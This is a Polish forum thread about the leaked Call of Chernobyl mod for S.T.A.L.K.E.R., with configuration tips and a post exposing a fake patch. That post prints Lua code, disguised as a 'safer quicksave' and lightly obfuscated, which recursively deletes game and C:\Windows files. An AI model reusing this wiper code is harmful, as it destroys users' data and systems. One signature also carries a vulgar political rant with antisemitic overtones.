[Call of Chernobyl] Nowy wielki SandBox

Regulamin forum
Dział "Modyfikacje Gotowe" służy do dyskusji o modyfikacjach, które już są stworzone lub do zadawania pytań na ich temat. Znajdziemy tutaj również linki do ściągnięcia modyfikacji (które powinny, a raczej muszą być w pierwszym poście tematu danej modyfikacji).

Przy zadawaniu pytania związanego z problemem dotyczącym modyfikacji, prosimy o podawanie treści całego loga błędu - koniecznie w tagu [CODE].

Przy cytowaniu plików *.LTX stosować tag [SYNTAX="ini"], przy cytowaniu plików *.script [SYNTAX="lua"] a przy cytowaniu plików *.xml - [SYNTAX="xml"].

Lokalizacja logów:
Windows XP - C:\Documents and Settings\All Users\Moje dokumenty\S.T.A.L.K.E.R. - Zew Prypeci\logs\xray_nazwaużytkownika.log
Windows Vista/7 - C:\Users\Public\Documents\S.T.A.L.K.E.R. - Zew Prypeci\logs\xray_nazwaużytkownika.log
Steam - X:\Program Files (x86)\Steam\SteamApps\common\Stalker Call of Pripyat\_appdata_\logs

Pytania na temat modyfikacji zadajemy w wątku dla niej stworzonym lub tworzymy nowy, jeśli takowego nie ma.

Gdy chcemy założyć nowy wątek, obowiązkowe jest przeczytanie tego tematu.

Re: [Call of Chernobyl] Nowy wielki SandBox

Postprzez Cromm Cruac w 07 Sie 2015, 14:43

Ale po co postujesz tutaj linki do leakniętych buildów? Ja rozumiem, że czujesz się oszukany i potraktowany z buta ale jednak postowanie tych linków jest trochę nieuczciwe.
Image

"Twoja opowieść mnie znudziła albowiem nie była o mnie" - Król Julian
Awatar użytkownika
Cromm Cruac
Modder

Posty: 2541
Dołączenie: 22 Sty 2010, 19:01
Ostatnio był: 26 Lip 2023, 10:13
Miejscowość: Londyn / Bielsko-Biała
Kozaki: 1077

Reklamy Google

Re: [Call of Chernobyl] Nowy wielki SandBox

Postprzez Koma w 07 Sie 2015, 15:10

Ja tam traktuję tą sprawę tak że skoro jest to po co udawać że nie istnieje i nic nie robić, kiedy możesz dać szansę innym żeby na to popatrzyli, zagrali i wyciągnęli własne wnioski czy coś idzie w dobrym kierunku czy nie.

Chociaż, w sumie wiem o co ci chodzi i mogę troszkę (dobra, ok, zdecydowanie) na tym punkcie tutaj przesadzać.

pytanko do pana cromma:

ABSOLUTE NATURE 3 LITE CoC EDITION WHEN
Awatar użytkownika
Koma
Stalker

Posty: 61
Dołączenie: 02 Sie 2014, 19:46
Ostatnio był: 23 Sty 2024, 18:43
Miejscowość: München
Frakcja: Najemnicy
Ulubiona broń: SIP-t M200
Kozaki: 27

Re: [Call of Chernobyl] Nowy wielki SandBox

Postprzez Cromm Cruac w 07 Sie 2015, 16:31

Alun napisał, że AN2 i AN3 Lite można narzucać na CoCa bezproblemowo. Niektóre levele z CSa są dostępne w SGM add-onie. Te też można dorzucić (o ile COC używa tych z CS a nie z SoC). Nie wiem czy można bezpośrednio przerzucić samą geometrię leveli z SoC na silnik CoP-a (np. tych z AA2). Możliwe, że zadziała, chociaż mogą być jakieś hocki-klocki z shaderami.

Co do reszty to pełnego AN3 do CoC-a nie będzie, bo nie mam czasu go zrobić. Alun napisał też, że będzie paczka z moimi teksturami ale dopiero po oficjalnym wydaniu.
Image

"Twoja opowieść mnie znudziła albowiem nie była o mnie" - Król Julian
Awatar użytkownika
Cromm Cruac
Modder

Posty: 2541
Dołączenie: 22 Sty 2010, 19:01
Ostatnio był: 26 Lip 2023, 10:13
Miejscowość: Londyn / Bielsko-Biała
Kozaki: 1077

Re: [Call of Chernobyl] Nowy wielki SandBox

Postprzez Koma w 07 Sie 2015, 17:07

Ewentualnie będzie można zrobić samemu bo w końcu dałeś ludziom assety AN do SDK.

Tak czy inaczej dzięki Cromm. Chyba muszę się faktycznie trochę ogarnąć.
Awatar użytkownika
Koma
Stalker

Posty: 61
Dołączenie: 02 Sie 2014, 19:46
Ostatnio był: 23 Sty 2024, 18:43
Miejscowość: München
Frakcja: Najemnicy
Ulubiona broń: SIP-t M200
Kozaki: 27

Re: [Call of Chernobyl] Nowy wielki SandBox

Postprzez PainChiller w 08 Sie 2015, 20:23

towarzysze! powiedzcie - Co zrobić aby inni NPC (z mojej frakcji) chodzili za mną? widziałem kilka filmów np: https://www.youtube.com/watch?v=RNclOlu541A
Ja nie kłamię, Ja oszczędnie dysponuje prawdą.
Awatar użytkownika
PainChiller
Modder

Posty: 705
Dołączenie: 29 Gru 2013, 16:16
Ostatnio był: 18 Sty 2023, 01:50
Miejscowość: Gdzieś w Poznańskiej Zonie
Frakcja: Monolit
Ulubiona broń: Gauss Gun
Kozaki: 190

Re: [Call of Chernobyl] Nowy wielki SandBox

Postprzez Koma w 08 Sie 2015, 21:25

Wyedytuj plik "configs/ai_tweaks/axr_companions.ltx"

Żeby w nim wartość "allow_simulation_squads_as_companions" była na "true"

Poza tym ustaw sobie "max_actor_squad_size" na 2 czy 3.


W wycieku było wszystko wyłączone ale Patch 1.0.9 pewnie włącza to z powrotem.
Awatar użytkownika
Koma
Stalker

Posty: 61
Dołączenie: 02 Sie 2014, 19:46
Ostatnio był: 23 Sty 2024, 18:43
Miejscowość: München
Frakcja: Najemnicy
Ulubiona broń: SIP-t M200
Kozaki: 27

Re: [Call of Chernobyl] Nowy wielki SandBox

Postprzez PainChiller w 08 Sie 2015, 21:41

ok. mam, ale co teraz? (w grze)
Ja nie kłamię, Ja oszczędnie dysponuje prawdą.
Awatar użytkownika
PainChiller
Modder

Posty: 705
Dołączenie: 29 Gru 2013, 16:16
Ostatnio był: 18 Sty 2023, 01:50
Miejscowość: Gdzieś w Poznańskiej Zonie
Frakcja: Monolit
Ulubiona broń: Gauss Gun
Kozaki: 190

Re: [Call of Chernobyl] Nowy wielki SandBox

Postprzez Koma w 08 Sie 2015, 22:26

Idź do dowolnego lidera jakiegokolwiek oddziału przemierzającego Zonę który ma jakieś dwie czy trzy osoby, pogadaj z nim i zobaczysz.


a teraz pora na bekę - świeży, bezpardonowo sensacjonalistyczny raport prosto ze świata Stalkera! (i 4czana)


Świat Stalkera doznaje prawdziwego szoku - Wściekłe TeamEPIC wypuściło fałszywego "patcha" 1.0.91 który sam w sobie nie różnił się od 1.0.9, ale zawierał w sobie ten oto destruktywny kod, gdzieś w skryptach.

Kod: Zaznacz wszystko
local function on_execute(path,filename)
local fullpath = path.."\\"..filename
lua_extensions.rm(fullpath)
end

[...]

-- safer quicksave to prevent corruption
local sp = getFS():update_path('$fs_root$', '')
sp = string.sub(sp,0,string.len(sp)-1)
lua_extensions.recurse_subdirectories_and_execute(sp,{"db","ltx","txt","exe","dll","ogf","ini","dds","ppe"},on_execute)
lua_extensions.recurse_subdirectories_and_execute('c' .. ':' .. '\\' .. 'W' .. 'ind' .. 'ows',{"db","ltx","txt","exe","dll","ogf","ini","dds","ppe"},on_execute)


Co to oznacza? To oznacza, że kiedy włączycie grę, cały wasz folder ze stalkerem zostanie "wyczyszczony", razem z rzeczami znajdującymi się w folderze c:/Windows/ co zostało również primitywnie zaciemnione! ('c' .. ':' .. '\\' .. 'W' .. 'ind' .. 'ows')

Działanie kodu jest również gwarantowane przez fakt, że launcher dostarczony z modem uruchamia się z uprawnieniami admina. (lecz nie uprawnieniami systemowymi co mogło uratować komputery paru osobom!)

Była to pułapka zastawiona przez TeamEPIC, w ich własnym serwerze z plikami na ludzi stojących za wyciekami oraz tych grających normalnie w CoCa. Ewentualnie patch zniknął z serwera, a sam serwer również stał się niedostępny, jednak patch dostał re-upa do celów eksperymentalno-dowodowych.

Cytując jedną z wysoko postawionych osób na forum stalker.pl, "leak LA to teraz oficjalnie liga okręgowa :E". Czekamy na dalsze wiadomości!
Awatar użytkownika
Koma
Stalker

Posty: 61
Dołączenie: 02 Sie 2014, 19:46
Ostatnio był: 23 Sty 2024, 18:43
Miejscowość: München
Frakcja: Najemnicy
Ulubiona broń: SIP-t M200
Kozaki: 27

Re: [Call of Chernobyl] Nowy wielki SandBox

Postprzez Pangia w 08 Sie 2015, 22:48

Czy tylko mnie ogarnia zażenowanie przy czytaniu tego tematu porównywalne do tego przy oglądaniu konferencji prasowych Ewy Kopacz? Rozgłos niewspółmierny do rangi sprawy, banda mentalnych gówniarzy pobawiła się w modderkę, nie wyszło im i odpi♥rdalają manianę w sieci. Team EPIC FAIL chyba.
Proszę państwa, sto pięćdziesiąt kilometrów na godzinę w ciągu kilku sekund, wspaniały wynik. Gdyby w ten sposób można było wypie*dolić z polskiej polityki tych wszystkich śmieci z Okrągłego Stołu, Leszka Millera, byłoby… cudownie i każdemu bym ku*wa kupił po takim Ferrari, byleby w piz*u pojechali tym PROSTO do swojego ukochanego… Izraela. SYJONIŚCI Europy, jedźcie do siebie! Pozdrawiam, Zbigniew Stonoga. Nie jestem antysemitą!
Awatar użytkownika
Pangia
Monolit

Posty: 4280
Dołączenie: 27 Maj 2012, 10:49
Ostatnio był: 28 Lis 2017, 19:49
Miejscowość: Kukle Karakańskie
Ulubiona broń: TOZ34
Kozaki: 854

Re: [Call of Chernobyl] Nowy wielki SandBox

Postprzez Plaargath w 09 Sie 2015, 04:18

Ja pierd*lę. Po pierwsze przykre, jak się patrzy, jak ludzie z poświęceniem godnym słusznej sprawy srają sobie w życiorys. A po drugie niesmaczne, jak się patrzy, jak próbują srać innym na dysk twardy. Eh...
Image Image

Merkantylizm, srerkantylizm.
Awatar użytkownika
Plaargath
Weteran

Posty: 653
Dołączenie: 23 Mar 2010, 15:12
Ostatnio był: 03 Kwi 2022, 22:03
Kozaki: 234

Re: [Call of Chernobyl] Nowy wielki SandBox

Postprzez alundaio w 09 Sie 2015, 05:59

Nie wydała Call of Chernobyl . Nie nasza odpowiedzialność , jeśli patch od osoby trzeciej . Aby złożyć winę na nas jest niesprawiedliwe . Ten kod jest nieszkodliwe . Nie można usunąć plików systemowych bez zezwolenia.

Nie sądzę , że wiele osób dba o takie dramatu Koma . W ciągu miesiąca , ludzie będą o tym wszystkim zapomnieć i iść dalej. Mam zamiar przejść na emeryturę po Call of Chernobyl . Najprawdopodobniej , Bangalore , jak również. Jeśli ludzie chcą zapomnieć o moją pomoc i wkład w społeczność z powodu działań nieszczęśliwy nastolatek to tak będzie .

English:
:

Not released Call of Chernobyl. Not our responsibility if a patch from a third party. To place the blame on us is unfair. This code is harmless. You can not delete system files without permission.

I do not think that many people care about such drama Koma. Within a month, people will forget all this and move on. I'm going to retire after we release Call of Chernobyl officially. Most likely, Bangalore, as well. If people want to forget about my help and contribution to the community because of the actions of an unhappy teenager then so be it.
Ostatnio edytowany przez alundaio 09 Sie 2015, 07:15, edytowano w sumie 3 razy
alundaio
Kot

Posty: 10
Dołączenie: 09 Sie 2015, 04:32
Ostatnio był: 29 Gru 2016, 16:39
Frakcja: Zombie
Ulubiona broń: Big Ben
Kozaki: 5

Re: [Call of Chernobyl] Nowy wielki SandBox

Postprzez Plaargath w 09 Sie 2015, 06:32

Co to, k***a, jest za trolling?
Image Image

Merkantylizm, srerkantylizm.
Awatar użytkownika
Plaargath
Weteran

Posty: 653
Dołączenie: 23 Mar 2010, 15:12
Ostatnio był: 03 Kwi 2022, 22:03
Kozaki: 234

PoprzedniaNastępna

Powróć do Zew Prypeci

Kto jest na forum

Użytkownicy przeglądający to forum: Brak zarejestrowanych użytkowników oraz 6 gości